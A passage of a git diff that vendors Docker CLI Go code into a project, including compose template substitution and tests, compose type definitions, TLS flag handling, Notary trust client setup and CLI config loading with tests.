+ + if escaped := groups["escaped"]; escaped != "" { + return escaped + } + + err = &InvalidTemplateError{Template: template} + return "" + }) + + return result, err +} + +// Split the string at the first occurrence of sep, and return the part before the separator, +// and the part after the separator. +// +// If the separator is not found, return the string itself, followed by an empty string. 
+func partition(s, sep string) (string, string) { + if strings.Contains(s, sep) { + parts := strings.SplitN(s, sep, 2) + return parts[0], parts[1] + } + return s, "" +} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go new file mode 100644 index 0000000000..6b81bf0a39 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/template/template_test.go @@ -0,0 +1,83 @@ +package template + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +var defaults = map[string]string{ + "FOO": "first", + "BAR": "", +} + +func defaultMapping(name string) (string, bool) { + val, ok := defaults[name] + return val, ok +} + +func TestEscaped(t *testing.T) { + result, err := Substitute("$${foo}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "${foo}", result) +} + +func TestInvalid(t *testing.T) { + invalidTemplates := []string{ + "${", + "$}", + "${}", + "${ }", + "${ foo}", + "${foo }", + "${foo!}", + } + + for _, template := range invalidTemplates { + _, err := Substitute(template, defaultMapping) + assert.Error(t, err) + assert.IsType(t, &InvalidTemplateError{}, err) + } +} + +func TestNoValueNoDefault(t *testing.T) { + for _, template := range []string{"This ${missing} var", "This ${BAR} var"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "This var", result) + } +} + +func TestValueNoDefault(t *testing.T) { + for _, template := range []string{"This $FOO var", "This ${FOO} var"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "This first var", result) + } +} + +func TestNoValueWithDefault(t *testing.T) { + for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok def", result) + } +} + +func 
TestEmptyValueWithSoftDefault(t *testing.T) { + result, err := Substitute("ok ${BAR:-def}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok def", result) +} + +func TestEmptyValueWithHardDefault(t *testing.T) { + result, err := Substitute("ok ${BAR-def}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok ", result) +} + +func TestNonAlphanumericDefault(t *testing.T) { + result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok /non:-alphanumeric", result) +} diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go new file mode 100644 index 0000000000..cae7b4af26 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/types/types.go @@ -0,0 +1,253 @@ +package types + +import ( + "time" +) + +// UnsupportedProperties not yet supported by this implementation of the compose file +var UnsupportedProperties = []string{ + "build", + "cap_add", + "cap_drop", + "cgroup_parent", + "devices", + "dns", + "dns_search", + "domainname", + "external_links", + "ipc", + "links", + "mac_address", + "network_mode", + "privileged", + "read_only", + "restart", + "security_opt", + "shm_size", + "stop_signal", + "sysctls", + "tmpfs", + "userns_mode", +} + +// DeprecatedProperties that were removed from the v3 format, but their +// use should not impact the behaviour of the application. +var DeprecatedProperties = map[string]string{ + "container_name": "Setting the container name is not supported.", + "expose": "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.", +} + +// ForbiddenProperties that are not supported in this implementation of the +// compose file. +var ForbiddenProperties = map[string]string{ + "extends": "Support for `extends` is not implemented yet. 
Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.", + "volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.", + "volumes_from": "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.", + "cpu_quota": "Set resource limits using deploy.resources", + "cpu_shares": "Set resource limits using deploy.resources", + "cpuset": "Set resource limits using deploy.resources", + "mem_limit": "Set resource limits using deploy.resources", + "memswap_limit": "Set resource limits using deploy.resources", +} + +// Dict is a mapping of strings to interface{} +type Dict map[string]interface{} + +// ConfigFile is a filename and the contents of the file as a Dict +type ConfigFile struct { + Filename string + Config Dict +} + +// ConfigDetails are the details about a group of ConfigFiles +type ConfigDetails struct { + WorkingDir string + ConfigFiles []ConfigFile + Environment map[string]string +} + +// Config is a full compose file configuration +type Config struct { + Services []ServiceConfig + Networks map[string]NetworkConfig + Volumes map[string]VolumeConfig + Secrets map[string]SecretConfig +} + +// ServiceConfig is the configuration of one service +type ServiceConfig struct { + Name string + + CapAdd []string `mapstructure:"cap_add"` + CapDrop []string `mapstructure:"cap_drop"` + CgroupParent string `mapstructure:"cgroup_parent"` + Command []string `compose:"shell_command"` + ContainerName string `mapstructure:"container_name"` + DependsOn []string `mapstructure:"depends_on"` + Deploy DeployConfig + Devices []string + DNS []string `compose:"string_or_list"` + DNSSearch []string `mapstructure:"dns_search" compose:"string_or_list"` + DomainName string `mapstructure:"domainname"` + Entrypoint []string 
`compose:"shell_command"` + Environment map[string]string `compose:"list_or_dict_equals"` + Expose []string `compose:"list_of_strings_or_numbers"` + ExternalLinks []string `mapstructure:"external_links"` + ExtraHosts map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"` + Hostname string + HealthCheck *HealthCheckConfig + Image string + Ipc string + Labels map[string]string `compose:"list_or_dict_equals"` + Links []string + Logging *LoggingConfig + MacAddress string `mapstructure:"mac_address"` + NetworkMode string `mapstructure:"network_mode"` + Networks map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"` + Pid string + Ports []string `compose:"list_of_strings_or_numbers"` + Privileged bool + ReadOnly bool `mapstructure:"read_only"` + Restart string + Secrets []ServiceSecretConfig + SecurityOpt []string `mapstructure:"security_opt"` + StdinOpen bool `mapstructure:"stdin_open"` + StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"` + StopSignal string `mapstructure:"stop_signal"` + Tmpfs []string `compose:"string_or_list"` + Tty bool `mapstructure:"tty"` + Ulimits map[string]*UlimitsConfig + User string + Volumes []string + WorkingDir string `mapstructure:"working_dir"` +} + +// LoggingConfig the logging configuration for a service +type LoggingConfig struct { + Driver string + Options map[string]string +} + +// DeployConfig the deployment configuration for a service +type DeployConfig struct { + Mode string + Replicas *uint64 + Labels map[string]string `compose:"list_or_dict_equals"` + UpdateConfig *UpdateConfig `mapstructure:"update_config"` + Resources Resources + RestartPolicy *RestartPolicy `mapstructure:"restart_policy"` + Placement Placement +} + +// HealthCheckConfig the healthcheck configuration for a service +type HealthCheckConfig struct { + Test []string `compose:"healthcheck"` + Timeout string + Interval string + Retries *uint64 + Disable bool +} + +// UpdateConfig the service update configuration +type 
UpdateConfig struct { + Parallelism *uint64 + Delay time.Duration + FailureAction string `mapstructure:"failure_action"` + Monitor time.Duration + MaxFailureRatio float32 `mapstructure:"max_failure_ratio"` +} + +// Resources the resource limits and reservations +type Resources struct { + Limits *Resource + Reservations *Resource +} + +// Resource is a resource to be limited or reserved +type Resource struct { + // TODO: types to convert from units and ratios + NanoCPUs string `mapstructure:"cpus"` + MemoryBytes UnitBytes `mapstructure:"memory"` +} + +// UnitBytes is the bytes type +type UnitBytes int64 + +// RestartPolicy the service restart policy +type RestartPolicy struct { + Condition string + Delay *time.Duration + MaxAttempts *uint64 `mapstructure:"max_attempts"` + Window *time.Duration +} + +// Placement constraints for the service +type Placement struct { + Constraints []string +} + +// ServiceNetworkConfig is the network configuration for a service +type ServiceNetworkConfig struct { + Aliases []string + Ipv4Address string `mapstructure:"ipv4_address"` + Ipv6Address string `mapstructure:"ipv6_address"` +} + +// ServiceSecretConfig is the secret configuration for a service +type ServiceSecretConfig struct { + Source string + Target string + UID string + GID string + Mode uint32 +} + +// UlimitsConfig the ulimit configuration +type UlimitsConfig struct { + Single int + Soft int + Hard int +} + +// NetworkConfig for a network +type NetworkConfig struct { + Driver string + DriverOpts map[string]string `mapstructure:"driver_opts"` + Ipam IPAMConfig + External External + Internal bool + Labels map[string]string `compose:"list_or_dict_equals"` +} + +// IPAMConfig for a network +type IPAMConfig struct { + Driver string + Config []*IPAMPool +} + +// IPAMPool for a network +type IPAMPool struct { + Subnet string +} + +// VolumeConfig for a volume +type VolumeConfig struct { + Driver string + DriverOpts map[string]string `mapstructure:"driver_opts"` + External 
External + Labels map[string]string `compose:"list_or_dict_equals"` +} + +// External identifies a Volume or Network as a reference to a resource that is +// not managed, and should already exist. +type External struct { + Name string + External bool +} + +// SecretConfig for a secret +type SecretConfig struct { + File string + External External + Labels map[string]string `compose:"list_or_dict_equals"` +} diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go new file mode 100644 index 0000000000..62f62433b8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/error.go @@ -0,0 +1,33 @@ +package cli + +import ( + "fmt" + "strings" +) + +// Errors is a list of errors. +// Useful in a loop if you don't want to return the error right away and you want to display after the loop, +// all the errors that happened during the loop. +type Errors []error + +func (errList Errors) Error() string { + if len(errList) < 1 { + return "" + } + + out := make([]string, len(errList)) + for i := range errList { + out[i] = errList[i].Error() + } + return strings.Join(out, ", ") +} + +// StatusError reports an unsuccessful exit by a command. 
+type StatusError struct { + Status string + StatusCode int +} + +func (e StatusError) Error() string { + return fmt.Sprintf("Status: %s, Code: %d", e.Status, e.StatusCode) +} diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go new file mode 100644 index 0000000000..9b6940f6bd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/client.go @@ -0,0 +1,13 @@ +package flags + +// ClientOptions are the options used to configure the client cli +type ClientOptions struct { + Common *CommonOptions + ConfigDir string + Version bool +} + +// NewClientOptions returns a new ClientOptions +func NewClientOptions() *ClientOptions { + return &ClientOptions{Common: NewCommonOptions()} +} diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cli/flags/common.go new file mode 100644 index 0000000000..e2f9da0732 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/common.go @@ -0,0 +1,120 @@ +package flags + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/opts" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/pflag" +) + +const ( + // DefaultTrustKeyFile is the default filename for the trust key + DefaultTrustKeyFile = "key.json" + // DefaultCaFile is the default filename for the CA pem file + DefaultCaFile = "ca.pem" + // DefaultKeyFile is the default filename for the key pem file + DefaultKeyFile = "key.pem" + // DefaultCertFile is the default filename for the cert pem file + DefaultCertFile = "cert.pem" + // FlagTLSVerify is the flag name for the tls verification option + FlagTLSVerify = "tlsverify" +) + +var ( + dockerCertPath = os.Getenv("DOCKER_CERT_PATH") + dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != "" +) + +// CommonOptions are options common to both the client and the daemon. 
+type CommonOptions struct { + Debug bool + Hosts []string + LogLevel string + TLS bool + TLSVerify bool + TLSOptions *tlsconfig.Options + TrustKey string +} + +// NewCommonOptions returns a new CommonOptions +func NewCommonOptions() *CommonOptions { + return &CommonOptions{} +} + +// InstallFlags adds flags for the common options on the FlagSet +func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) { + if dockerCertPath == "" { + dockerCertPath = cliconfig.ConfigDir() + } + + flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode") + flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")") + flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify") + flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote") + + // TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file") + + commonOpts.TLSOptions = &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, DefaultCaFile), + CertFile: filepath.Join(dockerCertPath, DefaultCertFile), + KeyFile: filepath.Join(dockerCertPath, DefaultKeyFile), + } + tlsOptions := commonOpts.TLSOptions + flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA") + flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file") + flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file") + + hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost) + flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to") +} + +// SetDefaultOptions sets default values for options after flag parsing is +// complete +func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { + // Regardless of whether the user sets it to true or false, if they + // specify --tlsverify at all then we need to turn on 
tls + // TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need + // to check that here as well + if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify { + commonOpts.TLS = true + } + + if !commonOpts.TLS { + commonOpts.TLSOptions = nil + } else { + tlsOptions := commonOpts.TLSOptions + tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify + + // Reset CertFile and KeyFile to empty string if the user did not specify + // the respective flags and the respective default files were not found. + if !flags.Changed("tlscert") { + if _, err := os.Stat(tlsOptions.CertFile); os.IsNotExist(err) { + tlsOptions.CertFile = "" + } + } + if !flags.Changed("tlskey") { + if _, err := os.Stat(tlsOptions.KeyFile); os.IsNotExist(err) { + tlsOptions.KeyFile = "" + } + } + } +} + +// SetLogLevel sets the logrus logging level +func SetLogLevel(logLevel string) { + if logLevel != "" { + lvl, err := logrus.ParseLevel(logLevel) + if err != nil { + fmt.Fprintf(os.Stderr, "Unable to parse logging level: %s\n", logLevel) + os.Exit(1) + } + logrus.SetLevel(lvl) + } else { + logrus.SetLevel(logrus.InfoLevel) + } +} diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go new file mode 100644 index 0000000000..81eaa38f43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/common_test.go @@ -0,0 +1,42 @@ +package flags + +import ( + "path/filepath" + "testing" + + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/pflag" +) + +func TestCommonOptionsInstallFlags(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := NewCommonOptions() + opts.InstallFlags(flags) + + err := flags.Parse([]string{ + "--tlscacert=\"/foo/cafile\"", + "--tlscert=\"/foo/cert\"", + "--tlskey=\"/foo/key\"", + }) + assert.NilError(t, err) + assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile") + assert.Equal(t, 
opts.TLSOptions.CertFile, "/foo/cert") + assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key") +} + +func defaultPath(filename string) string { + return filepath.Join(cliconfig.ConfigDir(), filename) +} + +func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := NewCommonOptions() + opts.InstallFlags(flags) + + err := flags.Parse([]string{}) + assert.NilError(t, err) + assert.Equal(t, opts.TLSOptions.CAFile, defaultPath("ca.pem")) + assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem")) + assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem")) +} diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go new file mode 100644 index 0000000000..8ee02c8429 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/required.go @@ -0,0 +1,96 @@ +package cli + +import ( + "fmt" + "strings" + + "github.com/spf13/cobra" +) + +// NoArgs validates args and returns an error if there are any args +func NoArgs(cmd *cobra.Command, args []string) error { + if len(args) == 0 { + return nil + } + + if cmd.HasSubCommands() { + return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) + } + + return fmt.Errorf( + "\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) +} + +// RequiresMinArgs returns an error if there is not at least min args +func RequiresMinArgs(min int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) >= min { + return nil + } + return fmt.Errorf( + "\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + min, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// RequiresMaxArgs returns an error if there is not at most max args +func RequiresMaxArgs(max int) cobra.PositionalArgs { + return func(cmd *cobra.Command, 
args []string) error { + if len(args) <= max { + return nil + } + return fmt.Errorf( + "\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + max, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// RequiresRangeArgs returns an error if there is not at least min args and at most max args +func RequiresRangeArgs(min int, max int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) >= min && len(args) <= max { + return nil + } + return fmt.Errorf( + "\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + min, + max, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// ExactArgs returns an error if there is not the exact number of args +func ExactArgs(number int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) == number { + return nil + } + return fmt.Errorf( + "\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + number, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go new file mode 100644 index 0000000000..51914f74b0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/trust/trust.go @@ -0,0 +1,232 @@ +package trust + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "net/url" + "os" + "path" + "path/filepath" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/auth/challenge" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/registry" + 
"github.com/docker/go-connections/tlsconfig" + "github.com/docker/notary" + "github.com/docker/notary/client" + "github.com/docker/notary/passphrase" + "github.com/docker/notary/storage" + "github.com/docker/notary/trustmanager" + "github.com/docker/notary/trustpinning" + "github.com/docker/notary/tuf/data" + "github.com/docker/notary/tuf/signed" +) + +var ( + // ReleasesRole is the role named "releases" + ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases") +) + +func trustDirectory() string { + return filepath.Join(cliconfig.ConfigDir(), "trust") +} + +// certificateDirectory returns the directory containing +// TLS certificates for the given server. An error is +// returned if there was an error parsing the server string. +func certificateDirectory(server string) (string, error) { + u, err := url.Parse(server) + if err != nil { + return "", err + } + + return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil +} + +// Server returns the base URL for the trust server. +func Server(index *registrytypes.IndexInfo) (string, error) { + if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" { + urlObj, err := url.Parse(s) + if err != nil || urlObj.Scheme != "https" { + return "", fmt.Errorf("valid https URL required for trust server, got %s", s) + } + + return s, nil + } + if index.Official { + return registry.NotaryServer, nil + } + return "https://" + index.Name, nil +} + +type simpleCredentialStore struct { + auth types.AuthConfig +} + +func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) { + return scs.auth.Username, scs.auth.Password +} + +func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string { + return scs.auth.IdentityToken +} + +func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) { +} + +// GetNotaryRepository returns a NotaryRepository which stores all the +// information needed to operate on a notary repository. 
+// It creates an HTTP transport providing authentication support. +func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) { + server, err := Server(repoInfo.Index) + if err != nil { + return nil, err + } + + var cfg = tlsconfig.ClientDefault() + cfg.InsecureSkipVerify = !repoInfo.Index.Secure + + // Get certificate base directory + certDir, err := certificateDirectory(server) + if err != nil { + return nil, err + } + logrus.Debugf("reading certificate directory: %s", certDir) + + if err := registry.ReadCertsDirectory(cfg, certDir); err != nil { + return nil, err + } + + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: (&net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + }).Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: cfg, + DisableKeepAlives: true, + } + + // Skip configuration headers since request is not going to Docker daemon + modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{}) + authTransport := transport.NewTransport(base, modifiers...) 
+ pingClient := &http.Client{ + Transport: authTransport, + Timeout: 5 * time.Second, + } + endpointStr := server + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + return nil, err + } + + challengeManager := challenge.NewSimpleManager() + + resp, err := pingClient.Do(req) + if err != nil { + // Ignore error on ping to operate in offline mode + logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err) + } else { + defer resp.Body.Close() + + // Add response to the challenge manager to parse out + // authentication header and register authentication method + if err := challengeManager.AddResponse(resp); err != nil { + return nil, err + } + } + + scope := auth.RepositoryScope{ + Repository: repoInfo.FullName(), + Actions: actions, + Class: repoInfo.Class, + } + creds := simpleCredentialStore{auth: authConfig} + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + Scopes: []auth.Scope{scope}, + ClientID: registry.AuthClientID, + } + tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))) + tr := transport.NewTransport(base, modifiers...) 
+ + return client.NewNotaryRepository( + trustDirectory(), + repoInfo.FullName(), + server, + tr, + getPassphraseRetriever(streams), + trustpinning.TrustPinConfig{}) +} + +func getPassphraseRetriever(streams command.Streams) notary.PassRetriever { + aliasMap := map[string]string{ + "root": "root", + "snapshot": "repository", + "targets": "repository", + "default": "repository", + } + baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap) + env := map[string]string{ + "root": os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"), + "snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + "targets": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + "default": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + } + + return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) { + if v := env[alias]; v != "" { + return v, numAttempts > 1, nil + } + // For non-root roles, we can also try the "default" alias if it is specified + if v := env["default"]; v != "" && alias != data.CanonicalRootRole { + return v, numAttempts > 1, nil + } + return baseRetriever(keyName, alias, createNew, numAttempts) + } +} + +// NotaryError formats an error message received from the notary service +func NotaryError(repoName string, err error) error { + switch err.(type) { + case *json.SyntaxError: + logrus.Debugf("Notary syntax error: %s", err) + return fmt.Errorf("Error: no trust data available for remote repository %s. 
Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName) + case signed.ErrExpired: + return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err) + case trustmanager.ErrKeyNotFound: + return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err) + case storage.NetworkError: + return fmt.Errorf("Error: error contacting notary server: %v", err) + case storage.ErrMetaNotFound: + return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err) + case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType: + return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err) + case signed.ErrNoKeys: + return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err) + case signed.ErrLowVersion: + return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err) + case signed.ErrRoleThreshold: + return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err) + case client.ErrRepositoryNotExist: + return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err) + case signed.ErrInsufficientSignatures: + return fmt.Errorf("Error: could not produce valid signature for %s. 
If Yubikey was used, was touch input provided?: %v", repoName, err) + } + + return err +} diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go new file mode 100644 index 0000000000..d81bf86b7a --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/config.go @@ -0,0 +1,120 @@ +package cliconfig + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/pkg/homedir" +) + +const ( + // ConfigFileName is the name of config file + ConfigFileName = "config.json" + configFileDir = ".docker" + oldConfigfile = ".dockercfg" +) + +var ( + configDir = os.Getenv("DOCKER_CONFIG") +) + +func init() { + if configDir == "" { + configDir = filepath.Join(homedir.Get(), configFileDir) + } +} + +// ConfigDir returns the directory the configuration file is stored in +func ConfigDir() string { + return configDir +} + +// SetConfigDir sets the directory the configuration file is stored in +func SetConfigDir(dir string) { + configDir = dir +} + +// NewConfigFile initializes an empty configuration file for the given filename 'fn' +func NewConfigFile(fn string) *configfile.ConfigFile { + return &configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + HTTPHeaders: make(map[string]string), + Filename: fn, + } +} + +// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from +// a non-nested reader +func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { + configFile := configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + } + err := configFile.LegacyLoadFromReader(configData) + return &configFile, err +} + +// LoadFromReader is a convenience function that creates a ConfigFile object from +// a reader +func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { + configFile := configfile.ConfigFile{ + 
AuthConfigs: make(map[string]types.AuthConfig), + } + err := configFile.LoadFromReader(configData) + return &configFile, err +} + +// Load reads the configuration files in the given directory, and sets up +// the auth config information and returns values. +// FIXME: use the internal golang config parser +func Load(configDir string) (*configfile.ConfigFile, error) { + if configDir == "" { + configDir = ConfigDir() + } + + configFile := configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + Filename: filepath.Join(configDir, ConfigFileName), + } + + // Try happy path first - latest config file + if _, err := os.Stat(configFile.Filename); err == nil { + file, err := os.Open(configFile.Filename) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) + } + defer file.Close() + err = configFile.LoadFromReader(file) + if err != nil { + err = fmt.Errorf("%s - %v", configFile.Filename, err) + } + return &configFile, err + } else if !os.IsNotExist(err) { + // if file is there but we can't stat it for any reason other + // than it doesn't exist then stop + return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) + } + + // Can't find latest config file so check for the old one + confFile := filepath.Join(homedir.Get(), oldConfigfile) + if _, err := os.Stat(confFile); err != nil { + return &configFile, nil //missing file is not an error + } + file, err := os.Open(confFile) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", confFile, err) + } + defer file.Close() + err = configFile.LegacyLoadFromReader(file) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", confFile, err) + } + + if configFile.HTTPHeaders == nil { + configFile.HTTPHeaders = map[string]string{} + } + return &configFile, nil +} diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go new file mode 100644 index 0000000000..d8a099ab58 --- /dev/null +++ 
b/vendor/github.com/docker/docker/cliconfig/config_test.go @@ -0,0 +1,621 @@ +package cliconfig + +import ( + "io/ioutil" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/pkg/homedir" +) + +func TestEmptyConfigDir(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + SetConfigDir(tmpHome) + + config, err := Load("") + if err != nil { + t.Fatalf("Failed loading on empty config dir: %q", err) + } + + expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName) + if config.Filename != expectedConfigFilename { + t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestMissingFile(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on missing file: %q", err) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestSaveFileToDirs(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + tmpHome += "/.docker" + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on missing file: %q", err) + } + + // Now save it and make sure it shows 